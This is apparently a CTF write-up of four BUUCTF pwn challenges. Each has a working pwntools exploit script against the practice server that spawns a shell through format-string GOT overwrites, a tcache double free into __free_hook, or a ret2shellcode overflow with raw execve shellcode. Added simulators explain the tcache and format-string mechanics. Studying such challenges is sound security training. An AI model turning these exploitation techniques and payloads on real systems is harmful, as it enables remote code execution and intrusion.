
PWN-PRACTICE-BUUCTF-21

Published: 2023/12/10


    • wdb_2018_2nd_easyfmt
    • ciscn_2019_es_1
    • axb_2019_fmt64
    • x_ctf_b0verfl0w

wdb_2018_2nd_easyfmt

Format string vulnerability: the program passes our input to printf as the format string, and the buffer sits at positional argument 6.
First printf: put printf@got at the start of the buffer and read it back with "%6$s" to leak the resolved address of printf; subtract the libc offset of printf to get the libc base and from it the address of system.
Second printf: use the same offset to overwrite printf@got with the address of system, so every later printf(buf) call is really system(buf).
Third input: send "/bin/sh\x00", which makes the program call system("/bin/sh").

# -*- coding:utf-8 -*-
from pwn import *

# context.log_level = 'debug'
# io = process('./wdb_2018_2nd_easyfmt')
io = remote('node4.buuoj.cn', 27039)
elf = ELF('./wdb_2018_2nd_easyfmt')
libc = ELF('./libc-2.23-16-x32.so')
printf_got = elf.got["printf"]

# 1st printf: our buffer is argument 6, so "%6$s" dereferences printf@got
# (placed at the start of the buffer) and prints the resolved address of printf
payload = p32(printf_got) + b"%6$s"
io.sendlineafter(b"repeater?\n", payload)
printf_addr = u32(io.recvuntil(b'\xf7')[-4:])
print("printf_addr==" + hex(printf_addr))
libc_base = printf_addr - libc.symbols["printf"]
system_addr = libc_base + libc.symbols['system']
print("system_addr==" + hex(system_addr))

# 2nd printf: let pwntools build the %hn writes that turn printf@got into system
payload = fmtstr_payload(6, {printf_got: system_addr})
io.sendline(payload)

# 3rd input: printf("/bin/sh") is now system("/bin/sh")
io.sendline(b'/bin/sh\x00')
io.interactive()

ciscn_2019_es_1

tcache double free (libc 2.27, which has no double-free check for tcache).
Chunk 0 (0x410) is too large for tcache, so freeing it puts it in the unsorted bin with fd = main_arena+96; showing it leaks a libc address. Freeing chunk 1 twice leaves it linked to itself in the tcache bin; the next allocation of that size returns chunk 1 and its name overwrites the next pointer with __free_hook, the allocation after that returns chunk 1 again, and the third returns __free_hook itself, where we write system. Freeing chunk 2 ("/bin/sh") then calls system("/bin/sh").
Reference: ciscn_2019_es_1

# -*- coding:utf-8 -*-
from pwn import *

# io = process("./ciscn_2019_es_1")
io = remote("node4.buuoj.cn", 28810)
elf = ELF("./ciscn_2019_es_1")
libc = ELF("./libc-2.27-18-x64.so")


def add(name_size, name, com_call):
    io.sendlineafter(b"choice:", b"1")
    io.sendlineafter(b"the size of compary's name\n", str(name_size).encode())
    io.sendlineafter(b"input name:\n", name)
    io.sendlineafter(b"input compary call:\n", com_call)


def show(index):
    io.sendlineafter(b"choice:", b"2")
    io.sendlineafter(b"input the index:\n", str(index).encode())


def free(index):
    io.sendlineafter(b"choice:", b"3")
    io.sendlineafter(b"input the index:", str(index).encode())


def menu_exit():
    io.sendlineafter(b"choice:", b"4")


# gdb.attach(io)
add(0x410, b"aaaa", b"130")          # 0: too big for tcache, lands in the unsorted bin when freed
add(0x28, b"bbbb", b"131")           # 1: the chunk we double free
add(0x68, b"/bin/sh\x00", b"132")    # 2: freeing this at the end becomes system("/bin/sh")

# leak: chunk 0's fd points to main_arena+96, and main_arena = __malloc_hook + 0x10
free(0)
show(0)
libc_base = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 96 - 0x10 - libc.sym["__malloc_hook"]
free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]

# tcache double free (no key check in glibc 2.27): the bin now reads 1 -> 1
free(1)
free(1)
add(0x28, p64(free_hook), b"133")    # 3: returns chunk 1, the name overwrites its next pointer
add(0x28, b"dddd", b"134")           # 4: chunk 1 again; the bin head is now __free_hook
add(0x28, p64(system), b"135")       # 5: returns __free_hook, which we fill with system
free(2)                              # free("/bin/sh") -> __free_hook -> system("/bin/sh")
io.interactive()
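The tcache free-list mechanics behind this sequence, as an added example that is not part of the original writeup and not glibc's own code: a small model of one tcache bin in which the next pointer lives in the first qword of the freed chunk's user data, as in glibc 2.27, so a user write to a freshly returned chunk forges it. Addresses, the heap start and the KEY constant are constructed. The glibc 2.29+ double-free check (the key field written into the chunk on free and looked for on the next free) is modelled as an option to show why the same three allocations abort on newer libcs; glibc 2.32+ additionally mangles the next pointer (safe-linking), which this model does not reproduce.

```python
from collections import defaultdict

# constructed stand-in for the address of the tcache struct that glibc >= 2.29
# stores in e->key on free
KEY = 0x5354454B434154


class DoubleFreeDetected(Exception):
    """Models glibc's "free(): double free detected in tcache 2" abort."""


class TcacheModel:
    """Just enough of glibc's tcache to follow the exploit: one LIFO bin per
    request size, the next pointer stored in the first qword of the freed
    chunk's user data (so user writes can forge it), no safe-linking."""

    def __init__(self, memory, detect_double_free=False):
        self.memory = memory                # address -> qword (the "heap")
        self.bins = defaultdict(int)        # request size -> bin head, 0 = empty
        self.detect = detect_double_free    # glibc >= 2.29 behaviour
        self.top = 0x555555559000           # constructed heap start

    def malloc(self, size):
        head = self.bins[size]
        if head:                            # glibc 2.27 tests entries[], not counts[]
            self.bins[size] = self.memory.get(head, 0)   # tcache_get: head = e->next
            if self.detect:
                self.memory[head + 8] = 0                # e->key = NULL
            return head
        chunk = self.top + 0x10             # fresh chunk: 16-byte header, then user data
        self.top += max((size + 0x17) & ~0xF, 0x20)
        return chunk

    def free(self, ptr, size):
        # real free() reads the size from the chunk header; the model is told it
        if self.detect and self.memory.get(ptr + 8) == KEY:
            e = self.bins[size]             # key matches: scan the bin for ptr
            while e:
                if e == ptr:
                    raise DoubleFreeDetected(hex(ptr))
                e = self.memory.get(e, 0)
        self.memory[ptr] = self.bins[size]  # tcache_put: e->next = head
        if self.detect:
            self.memory[ptr + 8] = KEY      # e->key = tcache
        self.bins[size] = ptr               # head = e


def tcache_poison(free_hook, system, detect_double_free=False):
    """Replay the script's steps after the leak. Returns the pointer handed out
    by the third 0x28 allocation and the qword written through it."""
    mem = {}
    heap = TcacheModel(mem, detect_double_free)
    chunk1 = heap.malloc(0x28)             # add(0x28, "bbbb", "131")  -> index 1
    heap.free(chunk1, 0x28)                # free(1)
    heap.free(chunk1, 0x28)                # free(1) again: bin is chunk1 -> chunk1
    a = heap.malloc(0x28)                  # add(0x28, p64(free_hook)): returns chunk1 ...
    mem[a] = free_hook                     # ... and the name overwrites its next pointer
    heap.malloc(0x28)                      # add(0x28, "dddd"): chunk1 again, head = free_hook
    target = heap.malloc(0x28)             # add(0x28, p64(system)): returns free_hook
    mem[target] = system                   # __free_hook = system
    return target, mem.get(free_hook)


def double_free_detected(free_hook, system):
    """True when the same sequence aborts under the glibc >= 2.29 key check."""
    try:
        tcache_poison(free_hook, system, detect_double_free=True)
    except DoubleFreeDetected:
        return True
    return False


if __name__ == "__main__":
    hook, sys_addr = 0x7ffff7dcf8e8, 0x7ffff7a1d440   # constructed sample addresses
    print([hex(v) for v in tcache_poison(hook, sys_addr)])
    print("aborts on 2.29+:", double_free_detected(hook, sys_addr))
```

The model makes the order of the three allocations visible: the first one only matters because its user data is the next pointer of the chunk that is still in the bin, the second consumes the self-link, and it is the third that returns the forged address.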

axb_2019_fmt64

Format string vulnerability on a 64-bit binary: leak strlen's address through strlen@got, then overwrite the low three bytes of strlen@got with those of system using %hhn and %hn, so that strlen(buf) becomes system(buf). Reference: [BUUCTF]PWN——axb_2019_fmt64 (64-bit format string, rewriting the GOT).
Note that the script computes the %c widths by plain subtraction, so it assumes high_sys > 9 and low_sys >= high_sys; if either fails, reduce the width modulo 0x100 (for %hhn) or 0x10000 (for %hn) instead, since only the low byte or low two bytes of the character count are written.

# -*- coding:utf-8 -*-
from pwn import *

context.log_level = "debug"
# io = process("./axb_2019_fmt64")
io = remote("node4.buuoj.cn", 26526)
elf = ELF("./axb_2019_fmt64")
libc = ELF("./libc-2.23-16-x64.so")
strlen_got = elf.got["strlen"]

# leak: our buffer starts at argument 8; "%9$saaaa" is exactly 8 bytes, so the
# address that follows is argument 9 and %9$s prints strlen's resolved address
io.recvuntil(b"Please tell me:")
payload = b"%9$saaaa" + p64(strlen_got)
io.sendline(payload)
strlen_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
print("strlen_addr==" + hex(strlen_addr))
libc_base = strlen_addr - libc.sym["strlen"]
system = libc_base + libc.sym["system"]
print("system==" + hex(system))

# only the low 3 bytes of strlen@got are rewritten (the upper bytes are left as
# they are, relying on strlen and system sharing them): byte 2 via %hhn, bytes 0-1 via %hn
high_sys = (system >> 16) & 0xff
low_sys = system & 0xffff

io.recvuntil(b"Please tell me:")
# the program prints "Repeater:" (9 bytes) before our string, hence the -9
payload = b"%" + str(high_sys - 9).encode() + b"c%12$hhn"
payload += b"%" + str(low_sys - high_sys).encode() + b"c%13$hn"
payload = payload.ljust(32, b"a")                  # 4 qwords: arguments 8..11
print(len(payload))  # 32
# the addresses go last because their NUL bytes would terminate the format string
payload += p64(strlen_got + 2) + p64(strlen_got)   # arguments 12 and 13
io.sendline(payload)

# strlen(buf) is now system(buf); the leading ';' ends the text the program
# prepends to our input so that /bin/sh still runs as its own command
io.recvuntil(b"Please tell me:")
io.sendline(b";/bin/sh\x00")
io.sendline(b"cat flag")
io.interactive()
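The arithmetic behind both format-string GOT overwrites on this page (what fmtstr_payload does for wdb_2018_2nd_easyfmt and what the axb_2019_fmt64 script computes by hand), as an added example that is not part of the original writeup and not pwntools code. It generalizes the hand computation: widths are reduced modulo 2**(8*size), so a later target value that is smaller than the running character count, or a first byte smaller than the printed prefix, still works; the conversions are emitted first and the addresses last because of their NUL bytes; and the number of buffer words is iterated until the positional indexes are consistent. A tiny printf model that only understands "%<width>c" and "%<n>$hhn|hn|n" checks the result against a constructed, zero-filled GOT slot. The GOT and system addresses, the 9-byte prefix and the argument offset 8 are assumptions taken from the script above.

```python
import struct

SPEC = {1: "hhn", 2: "hn", 4: "n"}    # write size in bytes -> printf length modifier
SIZE = {v: k for k, v in SPEC.items()}


def build_fmt_payload(writes, prefix_len, arg_base, ptr_size=8):
    """Build a format-string payload that performs `writes`.

    writes     -- list of (address, value, size), size in {1, 2, 4}
    prefix_len -- bytes the program prints before our buffer ("Repeater:" = 9)
    arg_base   -- printf positional index of the first word of our buffer
    Returns (payload, first_addr_arg): the conversions, padded to whole words,
    followed by the target addresses, the i-th of which is positional argument
    first_addr_arg + i.  Addresses come last because their NUL bytes end the
    format string.
    """
    n_words = 1
    while True:
        first_addr_arg = arg_base + n_words
        fmt = ""
        printed = prefix_len
        for i, (_addr, value, size) in enumerate(writes):
            # %hhn/%hn store only the low bytes of the count, so the width only
            # has to be right modulo 2**(8*size); this also handles value < printed
            width = (value - printed) % (1 << (8 * size))
            if width:                         # "%0c" would still print one char
                fmt += "%%%dc" % width
                printed += width
            fmt += "%%%d$%s" % (first_addr_arg + i, SPEC[size])
        needed = -(-len(fmt) // ptr_size)     # words the conversions occupy
        if needed <= n_words:
            break
        n_words = needed                      # indexes shift, rebuild once more
    fmt = fmt.ljust(n_words * ptr_size, "a")  # padding prints after the writes
    pack = "<Q" if ptr_size == 8 else "<I"
    payload = fmt.encode() + b"".join(struct.pack(pack, a) for a, _, _ in writes)
    return payload, first_addr_arg


def simulate_printf(fmt_bytes, args, memory, prefix_len):
    """Minimal printf model: literals, "%<width>c" and "%<n>$hhn|hn|n".
    args maps positional index -> value; memory maps address -> byte.
    Returns the final character count."""
    s = fmt_bytes.split(b"\x00", 1)[0].decode("latin-1")  # C string ends at NUL
    count = prefix_len
    i = 0
    while i < len(s):
        if s[i] != "%":
            count += 1
            i += 1
            continue
        j = i + 1
        while s[j].isdigit():
            j += 1
        num = int(s[i + 1:j]) if j > i + 1 else None
        if s[j] == "c":                       # pads one character to `width`
            count += max(num or 1, 1)
            i = j + 1
        elif s[j] == "$":                     # positional %n family: write count
            k = j + 1
            while s[k] != "n":
                k += 1
            size = SIZE[s[j + 1:k + 1]]
            addr = args[num]
            for b in range(size):             # little-endian, low bytes only
                memory[addr + b] = (count >> (8 * b)) & 0xff
            i = k + 1
        else:
            raise ValueError("unsupported conversion at offset %d" % i)
    return count


def overwrite_got_low_bytes(strlen_got, system, prefix_len=9, arg_base=8):
    """The script's two writes (byte 2 via %hhn, bytes 0-1 via %hn) run against
    a constructed zero-filled GOT slot; returns the slot's value afterwards."""
    writes = [(strlen_got + 2, (system >> 16) & 0xff, 1),
              (strlen_got, system & 0xffff, 2)]
    payload, _ = build_fmt_payload(writes, prefix_len, arg_base)
    # printf reads our buffer off the stack as consecutive 8-byte arguments
    words = [payload[k:k + 8] for k in range(0, len(payload), 8)]
    args = {arg_base + w: struct.unpack("<Q", word)[0] for w, word in enumerate(words)}
    memory = {strlen_got + b: 0 for b in range(8)}
    simulate_printf(payload, args, memory, prefix_len)
    return int.from_bytes(bytes(memory[strlen_got + b] for b in range(8)), "little")


if __name__ == "__main__":
    got, system = 0x601040, 0x7ffff7a52390          # constructed sample addresses
    print(build_fmt_payload([(got + 2, 0xa5, 1), (got, 0x2390, 2)], 9, 8))
    print(hex(overwrite_got_low_bytes(got, system)))
```

For the sample values the builder reproduces the script's layout (conversions in the first words, then the two addresses); for a system address whose low two bytes are smaller than its third byte, where the script's `low_sys-high_sys` would go negative, the modular width keeps the payload valid.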

x_ctf_b0verfl0w

32-bit ELF, NX disabled, so the stack is executable.
Stack overflow: the shellcode is placed at the start of the buffer, the return address points at a jmp esp gadget, and the bytes that follow it (which is where esp points after the ret) move esp back onto the buffer and jump to it, so the shellcode runs (ret2shellcode).

# -*- coding:utf-8 -*-
from pwn import *

context(arch='i386', os='linux')
# context.log_level = 'debug'
# io = process('./x_ctf_b0verfl0w')
io = remote('node4.buuoj.cn', 27191)
elf = ELF('./x_ctf_b0verfl0w')
jmp_esp = 0x08048504   # jmp esp gadget in the binary

# 20-byte execve("/bin//sh") via int 0x80 (ecx/argv is NULL, edx/envp is left as is);
# it sits at the very start of the buffer
shellcode = b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
payload = shellcode.ljust(0x24, b'a')   # 0x24 bytes up to the saved return address
payload += p32(jmp_esp)                 # return into jmp esp
# after the ret, esp points just past the return address, i.e. at these bytes:
# move esp back 0x28 (0x24 + 4) to the buffer start and jump into the shellcode
payload += asm('sub esp, 0x28; jmp esp')
io.recvuntil(b'name?\n')
io.sendline(payload)
io.interactive()
